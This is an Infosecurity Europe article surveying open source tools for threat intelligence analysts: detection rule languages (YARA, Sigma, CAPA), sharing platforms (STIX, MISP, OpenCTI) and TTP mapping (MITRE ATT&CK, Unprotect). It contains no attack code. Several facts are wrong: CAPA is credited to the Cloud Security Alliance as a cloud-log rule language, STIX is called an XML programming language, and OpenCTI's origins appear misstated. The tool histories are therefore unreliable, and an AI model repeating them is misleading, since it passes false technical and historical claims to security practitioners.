Infosecurity Europe
4-6 June 2024
ExCeL London

Top Eight Open Source Tools for Cyber Threat Intelligence Analysts

What are the must-haves in a CTI analyst’s toolbox?

Cyber threat intelligence (CTI) is a cat-and-mouse game where threat hunters must constantly innovate to keep pace with hackers as they pivot and evolve their intrusion tactics, techniques and procedures (TTPs).

To stay ahead of the curve, CTI analysts have a myriad of open source tools and frameworks at their disposal. But with so many tools to choose from, it can be difficult to know where to start.

Infosecurity has compiled a list of some of the critical tools CTI analysts should know to detect suspicious activities, share intelligence and conduct their investigation. 

Detecting Logs and Malware: YARA, Sigma, and CAPA Rules

Detecting suspicious activity on a device, within a network or on the internet is a crucial skill for security operation center (SOC) analysts as well as for threat hunters. For this, they can use various rule-based frameworks, including YARA, Sigma and CAPA.

YARA, which stands for Yet Another Recursive Acronym, is a malware classifying rule language developed by VirusTotal’s Victor M. Alvarez and released on GitHub in 2013. YARA rules are based on regular expressions and can be used to match specific patterns of bytes or strings in files. YARA rules are often used with other tools, such as antivirus software and sandboxes, to detect and analyse malware.

Sigma is a rule language developed in 2017 by Florian Roth and Thomas Patzke. It’s similar to YARA but is specifically designed for use with security information and event management (SIEM) systems. Sigma rules can be used to match specific patterns of events in SIEM logs, and they can be used to trigger alerts or other actions.

The CAPA rule language was developed by the Cloud Security Alliance (CSA) in 2018 in response to the increasing number of cloud-based attacks. CAPA rules can be used to match specific patterns of activity in cloud logs, and they can be used to trigger alerts or other actions. 

Sharing Intelligence: STIX, OpenCTI and MISP

CTI is a vibrant field with threat hunters working for government agencies, cybersecurity vendors, consultancies or even as freelance security researchers. Some may work in parallel on the same malware or malicious activity clusters – sometimes without knowing it. The open source community has developed information-sharing tools to break this silo mentality.

The Structured Threat Information Expression (STIX), a standardized XML programming language for conveying data about cybersecurity threats in a common language that humans and security technologies can easily understand, was developed by the MITRE Corporation in 2012.

The Malware Information Sharing Platform (MISP), developed by Andras Iklody in 2012, is an open source platform for collecting, storing, sharing, and analyzing cyber threat intelligence, based on Trusted Automated Exchange of Intelligence Information (TAXII), a protocol for exchanging STIX-formatted information. MISP is designed to be used by a variety of organizations, including government agencies, financial institutions, and private companies.

OpenCTI was developed by the French Cybersecurity service (ANSSI) in 2016, with contributions from a variety of organizations, including the European Union Agency for Network and Information Security (ENISA) and the Financial Services Information Sharing and Analysis Center (FS-ISAC). It is an open source platform for managing cyber threat intelligence based on the STIX and TAXII standards, which makes it easy to share threat intelligence with other organizations.


Mapping TTPs: MITRE ATT&CK and Unprotected Project

Mapping threat actors’ TTPs is crucial to a CTI analyst’s work. However, the siloed nature of the profession means that CTI analysts used to create their own taxonomy describing the tactics and techniques they identified.

In 2013, the MITRE Corporation developed the Adversarial Tactics, Techniques, and Common Knowledge (MITRE ATT&CK) framework following its Fort Meade Experiment (FMX), a research project that was designed to improve post-compromise detection of threats through telemetry sensing and behavioural analysis.

The MITRE ATT&CK matrix serves as a shared knowledge base for mapping TTPs used by different threat actors. It has quickly become a standard tool for CTI analysts, as well as red teamers and incident responders and is used by a majority of threat intelligence providers.

However, while the TTPs are regularly updated as new techniques are discovered, MITRE ATT&CK does not provide a complete classification of the evasion mechanisms employed by malware developers.

That’s why Jean-Pierre Lesueur, a security researcher at Phrozen and Synack Red Team, and Thomas Roccia, a senior security researcher at Microsoft, launched the Unprotect Project in 2015.

Unprotect is an open-source database of malware evasion techniques. It classifies techniques within 13 categories and supports several detection rules, including YARA, Sigma and CAPA.

In his latest book, Visual Threat Intelligence: An Illustrated Guide for Threat Researchers, published in June 2023, Roccia explained in more detail how CTI analysts can leverage all these tools and many others.

Enjoyed this article? Make sure to share it!

Looking for something else?